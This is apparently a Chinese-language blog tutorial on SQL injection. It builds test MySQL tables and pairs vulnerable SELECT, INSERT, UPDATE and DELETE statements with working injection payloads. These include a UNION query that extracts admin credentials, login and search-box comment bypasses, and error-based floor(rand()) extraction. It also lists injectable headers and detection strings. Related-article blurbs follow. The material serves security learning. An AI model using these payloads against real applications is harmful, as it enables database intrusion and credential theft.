sql注入漏洞语句原型及闭合方法

最新推荐文章于 2024-08-28 02:13:30 发布
最新推荐文章于 2024-08-28 02:13:30 发布
阅读量525 收藏 4
点赞数 5
文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74025111/article/details/138149478
版权

首先,创建测试库,表,准备好测试数据

1.建库

create database test;
show databases;
use test;

2.建表 personal_info(人员信息表),admin(假设为网站管理表,里面存的是网站后台管理员的账号密码)

create table if not exists `personal_info`(
`id` int unsigned not null auto_increment,
`name` varchar(50) not null,
`age` int not null,
`phonenu` varchar(20) not null unique,
`email` varchar(20) not null unique,
`sex` varchar(20) not null default 'man',
`birthday` date not null default '1991-01-01',
primary key(`id`),
index username_index(`name`),
index userpass_index(`phonenu`)
)ENGINE=MyISAM DEFAULT CHARSET=utf8 collate utf8_general_ci;

create table if not exists `admin`(
`id` int unsigned not null auto_increment,
`username` varchar(50) not null,
`passwd` varchar(50) not null,
`email` varchar(20) not null unique,
primary key(`id`),
index username_index(`username`),
index userpass_index(`passwd`)
)ENGINE=MyISAM DEFAULT CHARSET=utf8 collate utf8_general_ci;

2 select 查询注入:

关于select 的注入,也可能会是我们在实战中遇到的最多的一种注入语句。实际上在前端涉及增删改的操作一般都非常少,除非像那种论坛程序。对于大多数普通的 cms 而言,前端用户的大多数操作可能都是在点击链接,然后把对应的参数值传给后端脚本,然后脚本再到数据库中去查,之后再把查询的结果返回给前端页面显示给用户

# 标准数字型注入语句:
select * from personal_info where id=3;
# 数字型sql注入利用,数字嘛,也不存在什么闭合,直接跟上sql,就可以一下就把网站管理员的账号密码都查
出来:
select * from personal_info where id=-3 union select username,passwd,3,4,5,6,7
from admin;

# 标准字符型注入语句:
select * from personal_info where name='fedora';
# 字符型sql注入利用,想办法闭合单引号,and后面可随意跟上各种子查询就可以把所有数据遍历出来了
select * from personal_info where name='fedora' and 12=12 -- -; '

# 各种常见的登陆框注入漏洞原型sql语句:
select * from admin where username='admin' and passwd='abc123';
# 具体利用方法如下,依然是闭合前面注释后面,在and后面跟上各种子查询,直到把所有想要的数据都遍历出
来:
select * from admin where username='admin' and 12=12 -- - passwd='abc123';

# 针对各类搜索框注入的漏洞原型sql语句:
select * from personal_info where name like '%ka%';
# 具体利用方法 也非常简单,只需要前后的单引号和通配符都闭合掉即可保证语句的正常执行
select * from personal_info where name like '%%' and 12=12 -- +%';

3 insert 注入

因为一些功能需求,在前端可能会有很多需要录入各种用户信息的表单。丢给后端脚本以后,脚本会把 传过来的这些数据再插到数据库。例如典型的基于各种形式的个人中心功能。一旦遇到了,都可以随便 尝试 insert 注入。注意,想成功利用 insert 注入有个必要的前提,就是你一定要知道自己插入的数据在前端的什么地方显示。如果别人只是单单搜集用户信息,然后插到数据库中,并没有在前端页面上显示,即使你知道它存在 insert 注入也是个鸡肋

# 漏洞语句原型:
insert into personal_info(*)
values('injection',123,'123456789011','sqli@inection.org','man','0000-00-00');
# 利用如下,注意这里的闭合方法,insert前后字段的个数和数据类型务必一致,不然是闭合不了的,具体该怎
么确定字段个数呢,其实很简单,你就一位位的字段递增,直到它返回正常为止,然后再在爆出来的字段上查数据
就可以了
insert into personal_info(name,age,phonenu,email,sex,birthday)
values('injection',1,2,3,4,5)--
-123,'123456789011','sqli@inection.org','man','0000-00-00');

4 update 注入

关于 update 利用的点有两个:

  • 一个是在 set 的时候。如果 set 的是一个从前端传过来的变量,结果可想而知。
  • 另一个则是where后面的条件,因为这个条件也是可以从前端传过来的,这个后果想必就应该清楚了。

相对于 insert 可能会比较麻烦的一点的是,update 一般都是在 set 一个新值,这也就意味着我们在闭合的时候,在前端很可能是没有任何回显的,这样的话我们在实际查询数据的时候可能就要费点儿劲了。具体利用过程如下

# 漏洞原型语句:
update personal_info set email = 'flow@yeah.net' where name='fedora';
# 漏洞利用语句,其实,这里是利用 mysql 自身的报错特性来查数据的,但大多数情况下,稍微有点儿尝试的
目标站一般都会接收页面错误,这时你依然可以利用盲注的来查数据,方法大同小异
update personal_info set email=''*(select 1 from(select count(*),concat((select
(select (select concat(0x7e,database(),0x7e))) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)* ''
where name='fedora';

5 delete注入

对于delete语句,我们唯一能控制的地方可能就只有 where 后面的条件了。清晰明白这一点之后,剩下的事情就很好办了。说实话,在现在的 web 程序里,在前台涉及到 delete 的操作非常少,可以说几乎是没有。不过有时还是可以在后台尝试下,尤其在权限特别高的时候。至于怎么利用它来查数据,跟update 差不太多,基本也是靠报错或者盲注来搞。具体利用过程如下

# 漏洞原型sql语句:
delete from personal_info where id='fedora';
# 针对性注入利用,这个闭合其实跟select的时候差不多,无非就是数字或者字符串,数字就不存在什么闭合
了,如果是字符串,注意闭合掉前后的单引号即可
delete from personal_info where id='fedora' or (select 1 from (select
count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from
information_schema.tables group by y)x) -- +';

SQL注入常见注入点

  1. GET 请求的 URL: 正常情况下这里应该是最先会尝试的地方
  2. POST 数据字段中: 数据较多时一般都会用 POST 传,会是个不错的入手点
  3. cookie 中传的数据: 有些还可能会把一些参数放在 cookie 中传,所以这儿也会是个不错的入手点
  4. Referer: Referer 本身用来记录上一个页面的url,但一旦被存到数据库中之后又被带入查询,你懂的
  5. User-agent: UA 本身用来记录客户端信息,只要被记录到数据库之后又被带入查询一样可被利用
  6. X-Forwarded-For: XFF 本身专门用来记录客户端真实ip,如果脚本在处理时把它也带到数据库中去查询...

简单的检测方法

基于报错的检测方法 利用特殊字符 ' " % () 来进行测试。如果web application报错了就说明存在注入点。

基于布尔的检测方法

1' and '1'='1 //真
1' and '1'='2 //假

观察返回值是否按照输入返回真假。

老杨网络之路.
关注
理论篇8:SQL注入(字符型注入和数字型注入)
aiojay的博客
05-02 3592
SQL注入(字符型注入和数字型注入),Mysql中 int(3) 类型的含义,判断MYSQL注入闭合方式:
sql注入漏洞原理
qq_51553814的博客
08-04 705
sql注入漏洞原理 #0x00:漏洞产生原理 sql注入是用户在提交参数时参杂了sql注入代码,并且被后端执行了,这样就导致漏洞的产生 下面是一个有注入漏洞的登陆界面的后端 用户通过前端把账号和密码分别提交到$userName 和$Password中 $conn=mysqli_connect($dbServername,$dbUsername,$dbPassword,$dbName);//连接数据库 $sql="SELECT * FROM user WHERE username='$userName' an
Sql注入(手工注入思路、绕过、防御)
Naive的博客
09-26 2789
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
一篇文章带你搞定SQL注入闭合方式的判断(有报错回显)
csjjjd的博客
12-08 1754
接下来就看除了你输入的闭合符号,其余的符号是否能做到一一对应,如果可以,那么你的闭合方式就是对的。,人家不乐意,最终所以导致了报错。(为了各位能够看清,我把闭合的都弄成颜色一致的)接下来也没什么好说的,双引号引起报错,右括号没有对应的,那就直接?这里用单引号引起报错了,这里limit0.1右边的。‘ 的第一个单引号是一对的但是你却输入了。这里我先用一道题目进行解释,先随便输入单引号。,此时你输入进去的单引号变成了单身狗。‘ 的第一个单引号永远是一对的。老样子,还是先一个单引号试试水,
sql注入的学习
weixin_71008408的博客
01-28 1276
然后我们继续猜,但是要动脑子去猜,如果说他有几十列,我们不可能挨个去试,所以人还是要多读书,此时,我们就可以采取二分法,我们往大的猜,一半一半的缩小范围,专业又高效,但是这里并不是直接去更改select后的数字,而是利用数据库本身的代码order by(排序)去钻个空子。3.获取数据库,表名,列名,因为我们想要拿到管理员的账号密码,所以我们需要找到账号密码的存放位置,而在这之前,我们就要想办法找到表名,列名,而获取的的方法就是 猜。这样我们就拿到一些关键信息,username,password。
SQL注入原理及如何判断闭合
热门推荐
大大大蜜蜂的博客
09-30 1万+
一、SQL注入原理: 造成SQL注入的原因: 在没有对用户的输入进行过滤、检测的情况下,就把用户输入数据,带入到数据库中执行SQL语句。 利用SQL注入: 由于系统没有对输入的数据进行过滤、检测,就带入到数据库中执行SQL语句,那么当用户输入一条恶意的数据,使其与原SQL语句拼接、重组得到一条恶意的SQL语句,当数据库执行这条恶意的SQL语句时,就会把数据库中的信息暴露出来,从而泄露信息。 访问网页具体流程图: 在上图中,用户访问实验楼主页进行了如下过程: 1、在 Web 浏览器中输入 www.shiya
【网安第二章】SQL注入拓展——各种注入方法详细介绍
最新发布
lyj1597374034的博客
08-28 439
目录找闭合符1. 描述2. 场景2.1场景一1. 搞清楚闭合符包含哪些符号2. 确定闭合符究竟是什么3.相关关卡2.2 场景二——未知正确输入的情况下1. 具体2.相关关卡确认是否存在注入点1. 描述2. 场景2.1 场景一——GET1. 具体2. 相关关卡2.2 场景二——POST1. 具体2. 相关关卡2.3 场景三——POST sqlmap1. 具体2. 相关关卡2.4 场景四——页面信息提示点1. 具体2. 相关关卡2.5 场景五——头部注入(UserAgent)1. 具体2. 相关关卡2.6 场景
SQL注入分类.ppt
10-27
无回显的 SQL 注入包括布尔型注入、延迟注入等,攻击者无法通过页面的回显结果来判断注入是否成功,需要使用其他方法来判断。 SQL 注入是一种非常危险的攻击方式,需要我们采取有效的防御措施来保护 Web 应用程序的...
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 577
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 951
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
sql注入学习
wssmiss的博客
07-10 279
sql注入的简单介绍 sql注入的原理; 攻击者利用web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统游曳数意义的负号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵 代码示例 正常情况: 一个登陆界面,用户输入用户名和密码后,如id=112145 ,password=abcd 其php连接后台数据库执行的代码是 select...
WEB安全之:Mysql 数据库 SQL 注入(一)
f_carey的博客
06-01 453
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Mysql 数据库 SQL 注入(一)1 Mysql 数据库 SQL 注入基础知识1.1 information_schema1.2 Mysql 注释符号1.3 Mysql 注入常用语句及函数1.4 Mysql 注入常用操作符1.4.1 UNION 操作符1.5 Mysql 的逻辑运算1.6 注入类型1.6.1.
常见的sql注入类型闭合及符号
weixin_41489908的博客
08-16 2245
不是少年守不住初心,而是岁月慌了人心。。。 ---- 网易云热评 一、数字型注入 1、存在注入的url www.baidu.con/aiyou.php?id=1 2、数据库查询的语句 select * from aiyou where id=1 3、测试语句 1 and 1=2 二、字符型注入 1、存在注入的url www.baidu.con/aiyou.php?id=1 2、数据库查询的语句 select * from aiyou where id='1' 3、测试.
sql注入基础
2301_80913334的博客
04-09 943
理解web解析sql语句流程,了解sql注入类型,学会判断闭合方式,理解union注入中的每一步,最好能够用phpadmin结合使用学习sql注入就是通过把sql命令插到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器通过权限验证执行恶意的sql命令,从而进一步得到相应的数据信息。简单来说,就是通过构造一条sql语句,来查询想得到的信息。注入点就是可以实现sql注入的地方,通常是一个访问数据库的连接。
记一次使用sqlmap对oracle进行like注入
weixin_45439432的博客
12-17 3932
环境:jsp+oracle 从FUZZ的结果以及http响应的长度来看,普通的注入被waf拦截,存在like注入 like注入其实也并不是两边都要有 %,我们只需要闭合单引号就行了: 接下来用sysdata参数可以确定数据库为oracle。 sysdata函数为oracle数据库的日期,length求的是字符长度,可构造语句: 1’ AND LENGTH(SYSDATE) LIKE LENGTH(SYSDATE) AND ‘NGjD’ LIKE 'NGjD 现在可以确定存在注入了,于是移步到工具使用环
SQL注入闭合判断
m0_37638874的博客
06-28 1879
SQL注入闭合判断SQL注入闭合类型 SQL注入闭合类型可以分为三种数字型 单引号 双引号而这三种类型都可以SQL注入int型字段查询 像数据库判断字段为的,存在的可以通过以上方式判断闭合类型 然后通过以上方式,判断注:为什么说是int 型呢?这种只适用于前端传值是的,假如查询条件的字符型的,那闭合只能是与了,且,只能一个个去试了我就就可以写个脚本去判断闭合了,这个暂定,以后补充...
SQL注入概述
MAPLE102424的博客
04-17 2737
SQL注入概述
sql注入-闭合符号问题
outman23的博客
06-16 1016
sql环境搭建一级目录一级目录一级目录 环境搭建 首先下载源码, 源码地址 之后下载PHPstudy或者wamp,两者都是搭建服务器的软件 我用的是PHPstudy 把源码解压到以下路径 然后进入以下路径, 打开名为“db-creds”的文件,密码改为root 最后在PHP上创建网站 注意PHP版本最好低于5.5,这里我的版本是5.2.17 一级目录 一级目录 一级目录 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值